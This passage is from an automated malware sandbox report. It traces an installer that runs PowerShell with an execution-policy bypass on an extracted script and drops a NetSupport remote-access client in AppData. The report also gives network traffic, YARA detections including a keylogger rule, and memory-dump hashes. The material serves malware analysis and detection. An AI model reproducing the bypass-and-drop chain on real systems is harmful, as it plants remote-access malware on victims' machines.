74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Nov 8, 2024 19:15:26.370641947 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.10	49846	104.26.0.231	80	6588	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe

Timestamp	Bytes transferred	Direction	Data
Nov 8, 2024 19:15:26.376847029 CET	118	OUT	GET /location/loca.asp HTTP/1.1 Host: geo.netsupportsoftware.com Connection: Keep-Alive Cache-Control: no-cache
Nov 8, 2024 19:15:27.283221960 CET	1104	IN	HTTP/1.1 404 Not Found Date: Fri, 08 Nov 2024 18:15:27 GMT Content-Type: text/html; charset=us-ascii Transfer-Encoding: chunked Connection: keep-alive CF-Ray: 8df78c69291e358e-DFW CF-Cache-Status: DYNAMIC cf-apo-via: origin,host Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iMsyYgFtTpxapWTuYtUZKkbIpGoYg9k8f72mhXqA4mtZko9r99YuoimNfG7xUTJPvu57xXF5ep3tM9uOiosqUMRISTkUU6Fjx2fat%2Bk%2FF%2F7R%2FeJiHk8j9IPBz5IHZa1hRMHdF7%2BKL%2FC1JoJb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare server-timing: cfL4;desc="?proto=TCP&rtt=1338&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=118&delivery_rate=0&cwnd=244&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>0

Target ID:	0
Start time:	13:14:53
Start date:	08/11/2024
Path:	C:\Users\user\Desktop\KC0uZWwr8p.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\KC0uZWwr8p.exe"
Imagebase:	0xd00000
File size:	21'424'072 bytes
MD5 hash:	3C387C0DB035C0C3185D6FBD1AB46BD1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	13:14:54
Start date:	08/11/2024
Path:	C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\is-DM76C.tmp\KC0uZWwr8p.tmp" /SL5="$20454,18032967,815616,C:\Users\user\Desktop\KC0uZWwr8p.exe"
Imagebase:	0xb20000
File size:	3'305'472 bytes
MD5 hash:	77264DBCB409DE0C426BD5088B0FBE09
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	13:15:18
Start date:	08/11/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\user\AppData\Local\Temp\is-LP9OQ.tmp\ExtractedContent.ps1"
Imagebase:	0xa70000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.1657069390.0000000005617000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.1657069390.00000000055BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.1657069390.00000000055F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.1657069390.000000000571F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000004.00000002.1657069390.000000000581E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	13:15:18
Start date:	08/11/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff620390000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:15:21
Start date:	08/11/2024
Path:	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3146712251.0000000002EA9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3138687651.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000000.1572772209.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3141893648.00000000025D3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3148703275.0000000068CA0000.00000002.00000001.01000000.0000000F.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3148144330.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000006.00000002.3148108837.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\SystemUtil\client32.exe, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	13:15:31
Start date:	08/11/2024
Path:	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1674375162.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.1666448748.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1674299523.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1673364072.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	13:15:40
Start date:	08/11/2024
Path:	C:\Users\user\AppData\Roaming\SystemUtil\client32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SystemUtil\client32.exe"
Imagebase:	0x400000
File size:	121'304 bytes
MD5 hash:	4F2D0F4A5BA798FA9E85379C7C4BD36E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1758048452.00000000111DD000.00000004.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000000.1755559896.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1757246329.0000000000404000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000A.00000002.1758015972.000000001118F000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Function 079A5BF0 Relevance: 7.9, Strings: 6, Instructions: 396COMMON

Download Yara Rule

Strings

Hq, xrefs: 079A5CCD
Hq, xrefs: 079A5E46
Hq, xrefs: 079A5E93
Hq, xrefs: 079A5E24
TJq, xrefs: 079A5F4F
(q, xrefs: 079A5C20

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: (q$Hq$Hq$Hq$Hq$TJq
API String ID: 0-2195400840
Opcode ID: 998e3e3790dd5ac29dfe01b78acf8990d5795565a58035a1a4e9d7d30f19c4fa
Instruction ID: 6b6a98d7d1bb39ac49f2ae908755cc0f6074e3b5ef32aba13c4f947b1561b224
Opcode Fuzzy Hash: 998e3e3790dd5ac29dfe01b78acf8990d5795565a58035a1a4e9d7d30f19c4fa
Instruction Fuzzy Hash: DAE1EB70B007009FDB19EB39D494A6EBBF6AF89214B19846DE006CB361DF74EC45CB92

Function 079AA220 Relevance: 2.8, Strings: 2, Instructions: 340COMMON

Download Yara Rule

Strings

(q, xrefs: 079AA6F7
(q, xrefs: 079AA723

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: (q$(q
API String ID: 0-2485164810
Opcode ID: d1668fbd25d4f43da5f9b5011143b45b3be7986f9a7f582f37a037fedd6c1bd5
Instruction ID: 08033efa19bb5d6cfe237702bddc9bd434998e88381c810f5a84968e9e169f8e
Opcode Fuzzy Hash: d1668fbd25d4f43da5f9b5011143b45b3be7986f9a7f582f37a037fedd6c1bd5
Instruction Fuzzy Hash: ABE149B4A11209EFDB15CFA8D484B9DBBB6EF88314F24C059E805AB351CB75DD82CB91

Function 079AB2A0 Relevance: 1.9, Strings: 1, Instructions: 669COMMON

Download Yara Rule

Strings

(Xq, xrefs: 079AB42E

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: (Xq
API String ID: 0-1680464878
Opcode ID: 990e403d6ef9baa273017dc98a256230a4da6f8dda9a7b5a77efd638dfcb41fe
Instruction ID: 76ce2bad02bf41310ba78c501276632f47964a9490d18bd0c804b5d5bcd65f6f
Opcode Fuzzy Hash: 990e403d6ef9baa273017dc98a256230a4da6f8dda9a7b5a77efd638dfcb41fe
Instruction Fuzzy Hash: 06527AB4B00218DFDB24DB24C894BADB7B6BF85304F118099D8469B395DB79ED81CF92

Function 04C872A8 Relevance: 1.5, Strings: 1, Instructions: 261COMMON

Download Yara Rule

Strings

W, xrefs: 04C874FD

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: W
API String ID: 0-655174618
Opcode ID: 6f0619eef31bb8b8a85ea351e870c144e57dfcf97bad69c3ad4b75b0f17b6d6c
Instruction ID: 312a0c7dce966edb62794b9f888c89c9439360380f1329fd99c0a22b683fa82c
Opcode Fuzzy Hash: 6f0619eef31bb8b8a85ea351e870c144e57dfcf97bad69c3ad4b75b0f17b6d6c
Instruction Fuzzy Hash: 10A18034A01204DFCB15DFA9C8849AEBBF2FF89314B2485A9E445AB361D735ED81CF60

Function 079A64F3 Relevance: 1.5, Strings: 1, Instructions: 253COMMON

Download Yara Rule

Strings

cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe, xrefs: 079A6535

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe
API String ID: 0-988185686
Opcode ID: eb38b64adeaddfd547c48fc4329324da3a88903e2778c6cf11f4f2375d16e3a1
Instruction ID: 23544bebd00daaadba936c80c6c21a9ee7d79d6ed995402cbd7b0144f5c079b9
Opcode Fuzzy Hash: eb38b64adeaddfd547c48fc4329324da3a88903e2778c6cf11f4f2375d16e3a1
Instruction Fuzzy Hash: 5D91C1B8B007009BCF28DF74E05856DB7F6AF85624B24CA18D852AB394EF34EC418B95

Function 079AB293 Relevance: 1.4, Strings: 1, Instructions: 142COMMON

Download Yara Rule

Strings

(Xq, xrefs: 079AB42E

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: (Xq
API String ID: 0-1680464878
Opcode ID: 8fff27076427cf3d458066266d4878e3c2d134787ff83f7b9d84071929ca2cfe
Instruction ID: 457c10db60b70e0c5b49368bd69c707f2442059bc2fb76aeb72908f21f30c3eb
Opcode Fuzzy Hash: 8fff27076427cf3d458066266d4878e3c2d134787ff83f7b9d84071929ca2cfe
Instruction Fuzzy Hash: 18518D74B003149FDB24CB68C480B9DBBB6FF89314F118199D5469B351DB75AD81CF91

Function 079A69E3 Relevance: 1.4, Strings: 1, Instructions: 100COMMON

Download Yara Rule

Strings

cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe, xrefs: 079A6A9F

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe
API String ID: 0-988185686
Opcode ID: 9ee64ab30db37f0a6d52e0fa45a70ab96387e6055dd5375e978e41c27ae58927
Instruction ID: 1d8495c89796abb0446d3afc7d433334c1f30e7809ae88a92fd43743162c2736
Opcode Fuzzy Hash: 9ee64ab30db37f0a6d52e0fa45a70ab96387e6055dd5375e978e41c27ae58927
Instruction Fuzzy Hash: 612105726057916FC3218A7AAC448DBBFBDEEC6270309866BE404CBA11DB61DC8183E1

Function 079A6A78 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe, xrefs: 079A6A9F, 079A6AAD

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID: cEwWQkua1BpA/Fq/D1VwX+nZ8wKhAnSjwngEF6kWBRY2JI5MiCrx2QKsMopAhymujSO1UfGI+GzB++bYeJHvthU2HL0yy8aBRlGPrJJsnDbnsUPG6R1DCo5LtJIy6K04Pe
API String ID: 0-988185686
Opcode ID: cbf89aaefa92a56cf7f6e6112b1945e514276acb6da00ba18fc125866aafbc6c
Instruction ID: 4195d170d45bab5c4dc928e93cab4e052ad361045c5325d74d5b0d2d0303e2fb
Opcode Fuzzy Hash: cbf89aaefa92a56cf7f6e6112b1945e514276acb6da00ba18fc125866aafbc6c
Instruction Fuzzy Hash: 792193753605108FC748DF69D488959BBF9FF8DB2532681AAE909CB332DB71EC448B90

Function 07B06758 Relevance: .9, Instructions: 873COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1707337573.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 003b8625b042814598dac61957daf604a763c721f4c224680e849ae8df4960ba
Instruction ID: 8466b982db08c316cce56fc40cc011c150aea2959ae455d8b89e439d33ba7fbd
Opcode Fuzzy Hash: 003b8625b042814598dac61957daf604a763c721f4c224680e849ae8df4960ba
Instruction Fuzzy Hash: 4F5224F1B042169FEB149B64C81076ABFE2EF85258F14C0FAD9059B2D1EB36D861C7E1

Function 07B09020 Relevance: .6, Instructions: 576COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1707337573.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d8673f736d7884732c02dcf8880ed1f17690d4c9c8dc76484eaebde58166c0f
Instruction ID: facf4f5fb03cd2ea9574f5f41db5fb0e6285cac6f2a58ce2d93e97959e2c216e
Opcode Fuzzy Hash: 1d8673f736d7884732c02dcf8880ed1f17690d4c9c8dc76484eaebde58166c0f
Instruction Fuzzy Hash: B71227F17043159FEB258B68C81176ABFA2EFC6610F1480EAD905DB2D2EA35E941C7E1

Function 079A6D7D Relevance: .4, Instructions: 388COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967294b94edb6dfc7ff58076877a411990c0234ef261d4e2b4a93d0a54fa2499
Instruction ID: f1db7172fef5d3a666e064afc43c4e2586d277aeec232050f0a262e7beed0343
Opcode Fuzzy Hash: 967294b94edb6dfc7ff58076877a411990c0234ef261d4e2b4a93d0a54fa2499
Instruction Fuzzy Hash: 72212EB404E3D26FC3238B345DB64D5BFA4AF02251B0C019EE4C183992CB19A638CB92

Function 079A6DFD Relevance: .4, Instructions: 368COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2565d52735256bf21704645289ec8ae77e0c28cb978cf407b5339963fca66b81
Instruction ID: 9bb34d3716c249810b21e84064971d18a70befbda11926c412059fc6193da2c5
Opcode Fuzzy Hash: 2565d52735256bf21704645289ec8ae77e0c28cb978cf407b5339963fca66b81
Instruction Fuzzy Hash: 691122B114E3D22FC32343349DB61DAFFA89B12155B0C049AD4C187A92D709A66987A3

Function 07B04D10 Relevance: .4, Instructions: 357COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1707337573.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 09f969cdada87b1d803ccb257445153631e7b9a43261b745534c4ab0c6f4894c
Instruction ID: 371980c18ed48fae3c80bc3d5f6ac81d80e87d6455c64c24d24122e21e1d7cd1
Opcode Fuzzy Hash: 09f969cdada87b1d803ccb257445153631e7b9a43261b745534c4ab0c6f4894c
Instruction Fuzzy Hash: 17C138F1B043469FDB249B24881066ABFE1EF86250F1480FACA45DB691EB35C951CBE1

Function 07B007F8 Relevance: .3, Instructions: 314COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1707337573.0000000007B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_7b00000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0901f7cde0270f45b881f9026a132762275fde44f8441447cbb437ebeb91f40d
Instruction ID: 3270aac5f3012038c965c469be499101674d03effdc6bed015504da200ea6b5d
Opcode Fuzzy Hash: 0901f7cde0270f45b881f9026a132762275fde44f8441447cbb437ebeb91f40d
Instruction Fuzzy Hash: 8AB108B1B00306DFEB14AF69C45476ABFB2FF85214F1480EAE4499B292EB35D941CBD1

Function 04C88D90 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 523136cb251dd3a15767e1b333d48e9a1149527dcbb87331b76e8a36aa0d2b05
Instruction ID: f1889ee1f8899d091a3d419be845a9aa87cde4ec33b12c15e5298eece8a673a6
Opcode Fuzzy Hash: 523136cb251dd3a15767e1b333d48e9a1149527dcbb87331b76e8a36aa0d2b05
Instruction Fuzzy Hash: E091E87090A3948FDB16DB38DC54BA9BFB1AF46304F0581DAD4489F2A3D634AD89CF61

Function 04C88108 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d9ee40bc4dc17fc06e3fc1cc4041b6eab1aae76e499da3db24dc63dafd0a13dc
Instruction ID: e9b4a509922c79eb02003be299820a3ba65380f0d6742cb5482011d5a155c698
Opcode Fuzzy Hash: d9ee40bc4dc17fc06e3fc1cc4041b6eab1aae76e499da3db24dc63dafd0a13dc
Instruction Fuzzy Hash: 8A919E34A003048FCB05EF69D484A9EBBF6FF89324F1580A9E4459B362DB35ED45CB60

Function 079A6F90 Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1706701129.00000000079A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_79a0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fbdef0021583f183b82ee570132f323688dea59a79bc38cd0a02bf8f067cfcb3
Instruction ID: 8b71cc1fd7d6f0cd77a635f761ce1c4de1b04befd777c2b77e4a0051a4bfc90e
Opcode Fuzzy Hash: fbdef0021583f183b82ee570132f323688dea59a79bc38cd0a02bf8f067cfcb3
Instruction Fuzzy Hash: 14513436B04250AFCF16DFB4D85499DBFF6FF89220B0980A9E1068B661DB35EC51CB91

Function 04C82AA0 Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d42ebed17fbda99b27c06ddf51aa50b5ff215219fa8ac9c6803a5dba2239386a
Instruction ID: f6d87075b08bfe61f20979c8750ea7ecb7e92a12e204cd367dc9ab0b831c0a80
Opcode Fuzzy Hash: d42ebed17fbda99b27c06ddf51aa50b5ff215219fa8ac9c6803a5dba2239386a
Instruction Fuzzy Hash: A791C070A046059FCB15DF58C494AAEFBB2FF89314B2486AAD945AB3A1C335FC41CF90

Function 04C8F9C0 Relevance: .2, Instructions: 210COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.1656669558.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d5089a287d16f3748d39e68ada34b20a2b3d44c14267c73db569e0e3caa71516
Instruction ID: aa016d007e0154bb6cfec647298dfb195a5a0c903f09f693028df1d65b63c9cf
